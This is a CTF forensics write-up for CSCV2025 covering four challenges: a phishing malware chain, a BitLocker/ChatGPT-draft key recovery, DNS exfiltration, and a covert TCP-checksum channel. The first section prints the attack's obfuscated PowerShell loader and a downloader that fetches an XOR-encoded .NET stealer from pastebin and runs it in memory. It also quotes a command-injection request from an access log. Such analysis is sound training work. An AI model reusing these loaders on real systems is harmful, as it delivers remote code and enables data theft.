CSCV2025 Writeup

# NostalgiaS - We are given an `.ad1` image. - Mount it, navigate into `Users/kadoya/AppData/Local/Microsoft/Outlook/`, we can read the emails that were sent to Mr. Kadoya. - Inside one of them reads: ```! Hi player, I’m sharing something special with you today — a piece of childhood we all loved: the game Moly. Moly tells the touching story of a red-nosed mole and its friend Dau Dau. Together, they escape a burning forest and rebuild their lives in a peaceful snowy land — growing crops, raising animals, and building a new home filled with warmth and friendship. For many of us, Moly wasn’t just a game. It was a memory — quiet evenings, simple adventures, and that gentle happiness only old games can bring. You can find the game file attached. Password: playmoly2025. Run game by click "playmoly". I hope you’ll take a moment to revisit this little world — and relive the feeling of those days again. Enjoy your journey, ACE Team Moly ``` - Which tells us that Mr.Kadoya ran a hidden malware inside `playmoly`. - By extracting the archive from the mailbox, we unzip the file with the password: `playmoly2025` - Inside the file is a script that contains a peculiar line: ```javascript! var remoteHtaUrl = 'https://gist.githubusercontent.com/oumazio/ad5626973af6118062ae401c1e788464/raw/725302cda73d10e260e2ed0f26d935e576d3bc1c/FlashInstaller.hta'; ``` - By accessing the link, we are met with yet another file, this time containing the so-called "game code". Upon further inspection, the file connects to another Github GIST ```javascript! var logo = "https://gist.githubusercontent.com/oumazio/d2b2cbbe1ad51fd956815e78e6bfe31d/raw/2e34af3f8aac3392f07a1d59013cc8897dda8f3a/something.txt"; ``` - Accessing the link hands us yet another script, this time heavily obfuscated. Upon even further inspection, the script downloads another script. ```bash! $ grep 'https' something.txt https://gist.githubusercontent.com/oumazio/fdd0b2711ab501b30b53039fa32bc9ca/raw/ca4f9da41c5c64b3b43f4b0416f8ee0d0e400803/secr3t.txt ``` - Inside is yet another obfuscated script. ```powershell! Iex(neW-obJecT iO.cOMPrESsion.DeflaTEStreAM([iO.meMORysTrEAM] [convErt]::FroMbase64sTrInG('hVNhb9owEP2OxH+wUCSCIIZO06Qy7QNt1a1rxyZg6ybEJic5iFfHzhxTiLr+953BlKSgNV+i3N17797lzhvkOaShKL5qQd6RRmJMlve73YzlBkIuaaTSrmar7mnvD/wYfxg06jXvu9LXUGB5b/3qNX5PigyGLAVLMDbABOiPTDKOYA10xGPQ1zy6s9BPYBIV74pHS4nBes3ogjzUawQf7xbCc8FBGiwYwir4HP6GyJBxgQ2ldAiGPlU4BMhIxRCfK2m2sD0HvVArKRSLx0ZzufC9kt3Wc0F6wfNM5eC7jMsnsP7GxBJyy1zVohPNU79FgjwT3JBmp0n+ktsENOzafiDeLxKkzEQJaf7srae94HQQXLJgPmt7TfJYUXLkZ4XZiJXchxiazkq90BuQC5NsgXOlie9x+0PeEnwHwhyW2ky73drN+UBw6vEZMkzR2j1oM+v3J8om/D2TLXGWO+TkjRtT1YPSfMElE/8xUVZ92ceR6mNWKrrOy6G/IFyjhlvgY+0ztx92Em7lRjAX2D5Xku62B4dzg0vlV1Ura8PnaOXpMAIJpNEgAZMxKd/ANl51YphegLFQa2HXEH2/je1JWyVMuqG8knNlMXsGi9rK+SXZzjFvZ1zGeCKXgi1y9Dc2zPAIB4bzern6yzIUPDreEb2S9+oOG5dLITpk83q+Oo8k2pyImwOs8ZpOMPwP' ) ,[SYSTeM.io.comPRESsion.COmPRessiONmODe]::DECompResS) |FOReach-oBJeCt{ neW-obJecT SyStEM.Io.STreAmREaDeR( $_,[TEXT.EncOdiNG]::ascIi ) }| FOreacH-objeCT{$_.rEAdToeND( ) }) ``` - The script is compressed with `zlib` and encoded with base64, we can decrypt it with: ```python! $ sh -c -- "python3 - << 'PY' import base64, zlib, pathlib, sys b64 = pathlib.Path('script.txt').read_text().strip() data = base64.b64decode(b64) text = zlib.decompress(data, -zlib.MAX_WBITS).decode('ascii', errors='replace') pathlib.Path('decoded.txt').write_text(text) PY" ``` - The decoded file reads: ```java $AssemblyUrl = "https://pastebin.com/raw/90qeYSHA" $XorKey = 0x24 $TypeName = "StealerJanai.core.RiderKick" $MethodName = "Run" try { $WebClient = New-Object System.Net.WebClient $encodedContent = $WebClient.DownloadString($AssemblyUrl) $WebClient.Dispose() $hexValues = $encodedContent.Trim() -split ',' | Where-Object { $_ -match '^0x[0-9A-Fa-f]+$' } $encodedBytes = New-Object byte[] $hexValues.Length for ($i = 0; $i -lt $hexValues.Length; $i++) { $encodedBytes[$i] = [Convert]::ToByte($hexValues[$i].Trim(), 16) } $originalBytes = New-Object byte[] $encodedBytes.Length for ($i = 0; $i -lt $encodedBytes.Length; $i++) { $originalBytes[$i] = $encodedBytes[$i] -bxor $XorKey } $assembly = [System.Reflection.Assembly]::Load($originalBytes) if ($TypeName -ne "" -and $MethodName -ne "") { $targetType = $assembly.GetType($TypeName) $methodInfo = $targetType.GetMethod($MethodName, [System.Reflection.BindingFlags]::Static -bor [System.Reflection.BindingFlags]::Public) $methodInfo.Invoke($null, $null) } } catch { exit 1 } ``` - We are met with yet another script downloader, this time the script is obfuscated with XOR. ```java! $AssemblyUrl = "https://pastebin.com/raw/90qeYSHA" $XorKey = 0x24 ``` - After decoding, the script gives us a *.NET* binary, which we have to reverse engineer. The script seems to be an information collect, which have a component named `StealerJanai.component.systeminfo.SystemSecretInformationCollector.cs`, which reads: ```csharp! // StealerJanai, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null // StealerJanai.component.systeminfo.SystemSecretInformationCollector using System; using System.Collections.Generic; using System.Text; using Microsoft.Win32; public class SystemSecretInformationCollector { private const string MagicChars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"; public string Collect() { StringBuilder stringBuilder = new StringBuilder(); try { string text = DecodeMagicToString("AuEcc3iNuamB9JOyfS1pel55JqxgJ83"); string machineName = Environment.MachineName; string text2 = DecodeMagicToString("sA0m1sPHdceUL6HSvGAbFuhN"); string registryValue = GetRegistryValue(); string value = text + machineName + "_" + text2 + registryValue + "}"; stringBuilder.Append(value); } catch (Exception ex) { stringBuilder.AppendLine($"Error: {ex.Message}"); } return stringBuilder.ToString(); } private string DecodeMagicToString(string input) { try { if (string.IsNullOrEmpty(input)) { return string.Empty; } List<byte> list = new List<byte>(); foreach (char value in input) { int num = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz".IndexOf(value); if (num < 0) { return "Invalid character"; } int num2 = num; for (int num3 = list.Count - 1; num3 >= 0; num3--) { int num4 = list[num3] * 62 + num2; list[num3] = (byte)(num4 % 256); num2 = num4 / 256; } while (num2 > 0) { list.Insert(0, (byte)(num2 % 256)); num2 /= 256; } } int j; for (j = 0; j < list.Count && list[j] == 0; j++) { } if (j >= list.Count) { return string.Empty; } byte[] array = new byte[list.Count - j]; for (int k = 0; k < array.Length; k++) { array[k] = list[j + k]; } return Encoding.ASCII.GetString(array); } catch (Exception ex) { return "Decode error: " + ex.Message; } } private string GetRegistryValue() { try { using (RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\hensh1n")) { if (registryKey != null) { object value = registryKey.GetValue(""); if (value != null) { return value.ToString(); } } } return "Registry key not found"; } catch (Exception ex) { return "Registry error: " + ex.Message; } } } ``` - From this clue: ```csharp string text = DecodeMagicToString("AuEcc3iNuamB9JOyfS1pel55JqxgJ83"); string machineName = Environment.MachineName; string text2 = DecodeMagicToString("sA0m1sPHdceUL6HSvGAbFuhN"); string registryValue = GetRegistryValue(); string value = text + machineName + "_" + text2 + registryValue + "}"; ``` - The flag format seems to be `<text1_decoded>_<machineName>_<text2_decoded><registryValue>}` - Decoding the text with script gives us: - `text1`: `CSCV2025{your_computer_` - `text2`: `has_be3n_kicked_by` - Which gives us: `CSCV2025{your_computer_<machineName>_has_be3n_kicked_by<registryValue>}` - To find the machine name, we can read the logs. ```bash! $ evtx_dump 'Windows/System32/winevt/Logs/Application.evtx' | grep '<Computer>' <Computer>DESKTOP-47ICHL6</Computer> ``` - Which gives us: `DESKTOP-47ICHL6` - Finally, we need to get the registry value. ```csharp! using (RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\hensh1n")) ``` - The registry is under `SOFTWARE\\hensh1n`, which we can read with `hivex` ```bash! $ hivexget 'Users/kadoyat/NTUSER.DAT' 'SOFTWARE\\hensh1n' "@"="HxrYJgdu" ``` - Which gives us `HxrYJgdu`, combining all of them gives us the flag. Flag: `CSCV2025{your_computer_DESKTOP-47ICHL6_has_be3n_kicked_byHxrYJgdu}` # Case AlphaS - We are given an `.ad1` image and a Bitlocker drive. ``` . ├── evidences.ad1 ├── evidences.ad1.txt ├── external.vhdx └── ReadMe.pdf ``` - Going to `Windows/Prefetch`, this is where windows keep cache of ran applications, we can see the suspect has ran apps like `ChatGPT` and `SimpeNotes` from the prefetch files: - `CHATGPT.EXE-0140405B.pf` - `SIMPLENOTE.EXE-0ED0EC4F.pf` - These apps usually store logs on the devices inside `AppData`. - We then find traces of a Bitlocker password inside `Users/windows/AppData`. ```bash! $ find ./AppData/Local/Packages/OpenAI.ChatGPT-Desktop_2p2nqsd0c76g0-type f -exec grep -Hnl 'bitlocker' {} \; ./AppData/Local/Packages/OpenAI.ChatGPT-Desktop_2p2nqsd0c76g0/LocalCache/Roaming/ChatGPT/Local Storage/leveldb/000003.log ``` - The Bitlocker key is stored inside `000003.log`, which we can extract. ```bash $ strings './AppData/Local/Packages/OpenAI.ChatGPT-Desktop_2p2nqsd0c76g0/LocalCache/Roaming/ChatGPT/Local Storage/leveldb/000003.log' | grep 'bitlocker' {"drafts":[{"id":"null_thread","content":"I've locked my drive with this bitlocker key 028853-431640-166364-032076-217943-045837-542388-281017","timestamp":1759586173510}],"userId":"user-2smrET6gmFXbt2Kc8fCX9h2y"} {"drafts":[{"id":"null_thread","content":"I've locked my drive with this bitlocker key 028853-431640-166364-032076-217943-045837-542388-281017 and put the key in my usb","timestamp":1759586182351}],"userId":"user-2smrET6gmFXbt2Kc8fCX9h2y"} {"drafts":[{"id":"null_thread","content":"I've locked my drive with this bitlocker key 028853-431640-166364-032076-217943-045837-542388-281017 and put the key in my usb. If I lost my usb, ","timestamp":1759586191824}],"userId":"user-2smrET6gmFXbt2Kc8fCX9h2y"} ``` - The Bitlocker key is `028853-431640-166364-032076-217943-045837-542388-281017` - Using this key, we are able to get the file `secret.zip` out of the drive. Unfortunately, this zip file is also locked with a password. - From our previous clues, the suspect also installed `SimpleNotes`, which could also be where they stored the zip password. ```bash! $ find ./AppData/Local/Packages/22490Automattic.Simplenote_9h07f78gwnchp/ -type f -exec grep -Hnl 'zip password' {} \; ./AppData/Local/Packages/22490Automattic.Simplenote_9h07f78gwnchp/LocalCache/Roaming/Simplenote/IndexedDB/file__0.indexeddb.leveldb/000003.log $ strings './AppData/Local/Packages/22490Automattic.Simplenote_9h07f78gwnchp/LocalCache/Roaming/Simplenote/IndexedDB/file__0.indexeddb.leveldb/000003.log' ... content"Ozip password: 5525b8d2d8534b716467493f3660b11e1c44b22cd0c97275619b94a0e5c82fda" ... ``` - The zip password is `5525b8d2d8534b716467493f3660b11e1c44b22cd0c97275619b94a0e5c82fda` - Extracting it gives us `ssh.txt`, which reads: ``` # access via vpn or proxy if you are blocked https://pastebin.com/WciYiDEs cff4c6f0b68c31cb ``` - Inside the pastebin: ```yaml backup-server - 192.168.10.25 - username: admin - password: F@keP@ss2025! - service: MySQL web-frontend - 192.168.10.50 - username: deploy - password: W3bP@ss!8192 - service: Apache log-collector - 192.168.10.77 - username: syslog - password: L0gs2025#@@ - service: Graylog dev-test - 192.168.12.23 - username: flag - password: h3Y_Th!s_|5_jUs7_tH3_bE9IN|\|iNg_dc8fb5bdedd10877 - service: CSCV2025 ``` :::info **NOTE**: If you can't access Pastebin with a Proxy/VPN, use this frontend instead: https://pasted.drakeerv.com/WciYiDEs ::: Flag: `CSCV2025{h3Y_Th!s_|5_jUs7_tH3_bE9IN|\|iNg_dc8fb5bdedd10877}` # DNS Exfil - We are given three files: ``` . ├── 10.10.0.53_ns_capture.pcap ├── 10.10.5.80_access.log └── 10.10.5.80_error.log ``` - From the title, we know the perpetrator exiltrated the data with the DNS protocol. ```bash! $ tshark -r 10.10.0.53_ns_capture.pcap | grep hex | awk '{print $13}' | tr -d 'A' p.c7aec5d0d81ba8748acac6931e5add6c24b635181443d0b9d2.hex.cloudflar3.com p.f8aad90d5fc7774c1e7ee451e755831cd02bfaac3204aed8a4.hex.cloudflar3.com p.3dfec8a22cde4db4463db2c35742062a415441f526daecb59b.hex.cloudflar3.com p.f6af1ecb8cc9827a259401e850e5e07fdc3c1137f1.hex.cloudflar3.com f.6837abc6655c12c454abe0ca85a596e98473172829581235dd.hex.cloudflar3.com f.95380b06bf6dd06b89118b0003ea044700a5f2c4c106c3.hex.cloudflar3.com ``` - We save the hexdumps into seperate files. ```sh! $ cat 'p.dump' c7aec5d0d81ba8748acac6931e5add6c24b635181443d0b9d2f8aad90d5fc7774c1e7ee451e755831cd02bfaac3204aed8a43dfec8a22cde4db4463db2c35742062a415441f526daecb59bf6af1ecb8cc9827a259401e850e5e07fdc3c1137f1 $ cat 'f.dump' 6837abc6655c12c454abe0ca85a596e98473172829581235dd95380b06bf6dd06b89118b0003ea044700a5f2c4c106c3 ``` - Decoding the hexdumps gives us garbage data, maybe it's encrypted. - We then check out the other files ```bash! $ grep 'flag' 10.10.5.80_access.log 192.168.13.37 - - [10/Oct/2025:09:21:10 +0700] "GET /media/image1.php?c=cat%20/flag HTTP/1.1" 403 284 "-" "curl/7.88.1" ``` - Someone tried to access the flag around `09:21:20`, we now check the approximate timestamp in the other file. ```bash! $ grep '09:2.:..' 10.10.5.80_error.log ... 2025/10/10 09:26:03 [error] 1224#0: *5210 FastCGI sent in stderr: "PHP Notice: DEBUG VARS: APP_SECRET=F0r3ns1c-2025-CSCV; DATE_UTC=20251010" while reading response header from upstream, client: 192.168.13.37, server: portal.local, request: "GET /media/getfile.php?debug=true HTTP/1.1", upstream: "fastcgi://unix:/run/php/php8.2-fpm.sock:", host: "intra.portal.local" 2025/10/10 09:26:03 [error] 1224#0: *5210 FastCGI sent in stderr: "PHP Notice: H=SHA256(APP_SECRET); AES_KEY=H[0..15]; AES_IV=H[16..31]" while reading response header from upstream, client: 192.168.13.37, server: portal.local, request: "GET /media/getfile.php?debug=true HTTP/1.1", upstream: "fastcgi://unix:/run/php/php8.2-fpm.sock:", host: "intra.portal.local" ... ``` - From here we are able to find the AES Key ```bash $ echo 'F0r3ns1c-2025-CSCV' | sha256sum f17f8c9fbb0f68bf1fab0124c5bef912bd5c0c7e6750b1dd1ab0f8ea1fdd639b - ``` - Which gives us: - Key: `5769179ccdf950443501d9978f52ddb5` - IV: `1b70ca0d4f607a976c6639914af7c7a6` - Decrypting `f.dump` gives us the flag. ```bash! $ xxd -r -p 'f.dump' | openssl enc -aes-128-cbc -d -K 5769179ccdf950443501d9978f52ddb5 -iv 1b70ca0d4f607a976c6639914af7c7a6 CSCV2025{DnS_Exf1ltr4ti0nnnnnnnnnnNN!!} ``` Flag: `CSCV2025{DnS_Exf1ltr4ti0nnnnnnnnnnNN!!}` --- # CovertS - We are given a `.pcap` file, from the challenge we know that the attacker has exfiltrated our data using some sort of covert channel. - Opening up the **Conversation** tab, we can find the following results: ![this](https://hackmd.io/_uploads/SJY0M9_0lg.jpg) - A lot of data was sent towards `192.168.192.1` with no response. - We can filter the traffic with: `ip.dst == 192.168.192.1` ![yes](https://hackmd.io/_uploads/ByN0Q9dRle.jpg) - What the? All of the checksums are wrong! :::info **To validate checksums**: Right Click -> Protocol Preferences -> Transmission Control Protocol -> Validate the TCP checksum if possible ::: - The wrong checksums were sent over intentionally to covert the data. We can start extracting them with `tshark`. ```bash $ tshark -r challenge.pcapng -Y 'ip.dst == 192.168.192.1' -T fields -e tcp.checksum | sed 's/0x//g' | tr -d '\n' 53475673624738675a585a6c636e6c76626d5573445170496233636759584a6c49486c766453426b62326c755a7a3867515342325a584a3549486468636d306764325673593239745a5342306279424455304e574d6a41794e53454e4367304b5353647449484a6c595778736553426e6247466b4948527649484e6c5a53423562335567614756795a534268626d51675353426f6233426c49486c76645364795a5342795a57466b6553426d62334967595734675a58686a61585270626d63675a585a6c626e51675957686c595751754946526f61584d675131524749476c7a4947467362434268596d39316443426a61474673624756755a326c755a7942356233567949484e72615778736379776762475668636d3570626d6367626d56334948527961574e72637977675957356b4947396d49474e7664584a7a5a53417449476868646d6c755a79426d6457346759577876626d63676447686c49486468655334675132397563326c6b5a584967644768706379427361585230624755676257567a6332466e5a5342756233516759584d675953426a61474673624756755a3255676158527a5a57786d4c4342696458516763326c74634778354947467a4947313549486468655342765a69427a59586c70626d6367614756736247386764473867595778734947396d49486c7664534268625746366157356e4948427359586c6c636e4d7544516f4e436c526861325567595342746232316c626e51734947646c6443426a6232316d62334a3059574a735a5377675957356b49475675616d39354948526f5a5342796157526c4c694258614756306147567949486c76645364795a53426f5a584a6c4948527649474e766258426c644755675a6d6c6c636d4e6c62486b73494852764947786c59584a7549484e766257563061476c755a7942755a58637349473979494770316333516764473867614746325a534268494764766232516764476c745a5377675353426f6233426c49454e54513159794d4449314948647062477767596d5567595734676457356d62334a6e5a58523059574a735a53426c6548426c636d6c6c626d4e6c49475a7663694235623355674b4735766443423061476c7a49474e6f595778735a57356e5a5377676347787a49475a76636d646c6443423061476c7a49484e6f4b6e5167543139504b51304b44517042626d5167626d39334c4342336158526f623356304947746c5a584270626d6367655739314948646861585270626d63675957353549477876626d646c636934754c67304b44516f6f633239745a5739755a53426859324e705a4756756447467362486b6763325675644342746553426a6147467349485a705953426c625746706243427a6279426f5a584a6c49476c7a49486c7664584967626d563349475a73595763364b51304b4451704455304e574d6a41794e5874746556396a6147467358326476644639735a5746725a575266596d566d62334a6c5833526f5a56396a623235305a584e3058324a7964576866614756795a56397063313935623356795832356c6431396d6247466e583249344f446b78597a526c4d545133597a51314d6d493459324d324e6a51795a6a45774e4441774e4455796651304b445170655831346763334a3549475a7663694230614755676257567a63773d3d⏎ ``` - This is a hexdump, which we can read with `xxd`. ```bash $ tshark -r challenge.pcapng -Y 'ip.dst == 192.168.192.1' -T fields -e tcp.checksum | sed 's/0x//g' | tr -d '\n' | xxd -r -p SGVsbG8gZXZlcnlvbmUsDQpIb3cgYXJlIHlvdSBkb2luZz8gQSB2ZXJ5IHdhcm0gd2VsY29tZSB0byBDU0NWMjAyNSENCg0KSSdtIHJlYWxseSBnbGFkIHRvIHNlZSB5b3UgaGVyZSBhbmQgSSBob3BlIHlvdSdyZSByZWFkeSBmb3IgYW4gZXhjaXRpbmcgZXZlbnQgYWhlYWQuIFRoaXMgQ1RGIGlzIGFsbCBhYm91dCBjaGFsbGVuZ2luZyB5b3VyIHNraWxscywgbGVhcm5pbmcgbmV3IHRyaWNrcywgYW5kIG9mIGNvdXJzZSAtIGhhdmluZyBmdW4gYWxvbmcgdGhlIHdheS4gQ29uc2lkZXIgdGhpcyBsaXR0bGUgbWVzc2FnZSBub3QgYXMgYSBjaGFsbGVuZ2UgaXRzZWxmLCBidXQgc2ltcGx5IGFzIG15IHdheSBvZiBzYXlpbmcgaGVsbG8gdG8gYWxsIG9mIHlvdSBhbWF6aW5nIHBsYXllcnMuDQoNClRha2UgYSBtb21lbnQsIGdldCBjb21mb3J0YWJsZSwgYW5kIGVuam95IHRoZSByaWRlLiBXaGV0aGVyIHlvdSdyZSBoZXJlIHRvIGNvbXBldGUgZmllcmNlbHksIHRvIGxlYXJuIHNvbWV0aGluZyBuZXcsIG9yIGp1c3QgdG8gaGF2ZSBhIGdvb2QgdGltZSwgSSBob3BlIENTQ1YyMDI1IHdpbGwgYmUgYW4gdW5mb3JnZXR0YWJsZSBleHBlcmllbmNlIGZvciB5b3UgKG5vdCB0aGlzIGNoYWxsZW5nZSwgcGxzIGZvcmdldCB0aGlzIHNoKnQgT19PKQ0KDQpBbmQgbm93LCB3aXRob3V0IGtlZXBpbmcgeW91IHdhaXRpbmcgYW55IGxvbmdlci4uLg0KDQooc29tZW9uZSBhY2NpZGVudGFsbHkgc2VudCBteSBjaGFsIHZpYSBlbWFpbCBzbyBoZXJlIGlzIHlvdXIgbmV3IGZsYWc6KQ0KDQpDU0NWMjAyNXtteV9jaGFsX2dvdF9sZWFrZWRfYmVmb3JlX3RoZV9jb250ZXN0X2JydWhfaGVyZV9pc195b3VyX25ld19mbGFnX2I4ODkxYzRlMTQ3YzQ1MmI4Y2M2NjQyZjEwNDAwNDUyfQ0KDQpeX14gc3J5IGZvciB0aGUgbWVzcw==⏎ ``` - Which gives us a base64 encoded string, which translates to: ``` $ tshark -r challenge.pcapng -Y 'ip.dst == 192.168.192.1' -T fields -e tcp.checksum | sed 's/0x//g' | tr -d '\n' | xxd -r -p | base64 -d Hello everyone, How are you doing? A very warm welcome to CSCV2025! I'm really glad to see you here and I hope you're ready for an exciting event ahead. This CTF is all about challenging your skills, learning new tricks, and of course - having fun along the way. Consider this little message not as a challenge itself, but simply as my way of saying hello to all of you amazing players. Take a moment, get comfortable, and enjoy the ride. Whether you're here to compete fiercely, to learn something new, or just to have a good time, I hope CSCV2025 will be an unforgettable experience for you (not this challenge, pls forget this sh*t O_O) And now, without keeping you waiting any longer... (someone accidentally sent my chal via email so here is your new flag:) CSCV2025{my_chal_got_leaked_before_the_contest_bruh_here_is_your_new_flag_b8891c4e147c452b8cc6642f10400452} ^_^ sry for the mess⏎ ``` Flag: `CSCV2025{my_chal_got_leaked_before_the_contest_bruh_here_is_your_new_flag_b8891c4e147c452b8cc6642f10400452}` :::info **NOTE:** cam on anh s3asick5 vi hint sob sob sob 😭😭😭 **SLIGHTLY BIGGER NOTE:** All of these were solved after the event was over.$\int^{\int^\int}$ :::